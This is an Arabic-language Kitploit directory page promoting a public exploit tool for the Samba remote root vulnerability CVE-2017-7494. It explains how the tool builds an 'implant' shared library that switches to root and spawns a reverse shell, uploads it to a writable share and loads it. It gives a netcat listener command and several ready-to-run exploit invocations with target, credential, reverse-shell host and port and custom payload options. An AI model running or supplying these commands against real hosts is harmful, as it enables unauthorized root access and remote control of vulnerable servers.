Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-7494 — أداة استغلال عن بُعد لجذر نظام SAMBA (CVE-2017-7494) تقوم بتجميع حمولة مكتبة مشتركة، وتحميلها إلى مشاركة قابلة للكتابة، وتفعيل تحميلها لتوليد شل عكسي بصلاحيات الجذر. | Kitploit
أدوات/GitHubGitHub/sudlit/cve-2017-7494
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأداة الوصول عن بعد
GitHubsudlit/cve-2017-7494

CVE-2017-7494

أداة استغلال عن بُعد لجذر نظام SAMBA (CVE-2017-7494) تقوم بتجميع حمولة مكتبة مشتركة، وتحميلها إلى مشاركة قابلة للكتابة، وتفعيل تحميلها لتوليد شل عكسي بصلاحيات الجذر.

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-7494

استغلال الجذر عن بُعد لثغرة SAMBA CVE-2017-7494.

التفاصيل

ينقسم هذا الاستغلال إلى جزأين:

  • أولاً: يقوم بتجميع حمولة تسمى "implant.c" وإنشاء مكتبة (libimplantx32.so أو libimplantx64.so) تتحول إلى المستخدم الجذر، وتنفصل عن العملية الأم، وتُطلق شل عكسي.
  • ثانيًا: يبحث عن مشاركة قابلة للكتابة في المضيف الهدف المحدد، ويرفع المكتبة باسم عشوائي، ويحاول تحميلها.

طالما أن الهدف ضعيف والحمولة مناسبة لنظام التشغيل ومعمارية الهدف، فإن الاستغلال موثوق بنسبة 100%.

كيفية الاستخدام

على جهازك، قم بتشغيل الأمر التالي:

root@kitploit:~
$ nc -p 31337 -l

ثم، قم بتشغيل الاستغلال ضد هدفك وانتظر حتى يتصل مرة أخرى بـ Netcat الخاص بك:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip

إذا أغلقت الشل العكسي بسرعة كبيرة، بدلاً من إعادة تشغيل الاستغلال لرفع الوحدة، إلخ... يمكنك فقط تمرير مسار الوحدة التي تم رفعها بالفعل. بافتراض أنها تم رفعها إلى /shared/directory/ باسم "module.so"، يمكنك تشغيل أمر مثل التالي:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

تحديث 25/11/2017 - Archivaldo

يمكنك الآن تشغيل الاستغلال على samba 3.5.0 و 3.6.0، ما عليك سوى إضافة الوسيطة -o 1

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1 

يمكنك الآن استخدام ملف .so المخصص الخاص بك

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so

في حال احتجت لتشغيل هذا السكريبت من جهاز x86، فإن تجميع ملفات implant الثنائية سينشئ ملفين بتنسيق x86. باستخدام العلامة -n 1 يمكنك تعطيل التجميع ونسخ libimplantx64.so من جهاز آخر.

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

إذا كان samba يعمل فقط على المنفذ 139، يمكنك تعيين منفذ الخادم البعيد باستخدام الوسيطة -p

root@kitploit:~
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

ملاحظات

لم أعد أدعمه بعد الآن.

-- Joxean Koret

تنزيل الأداة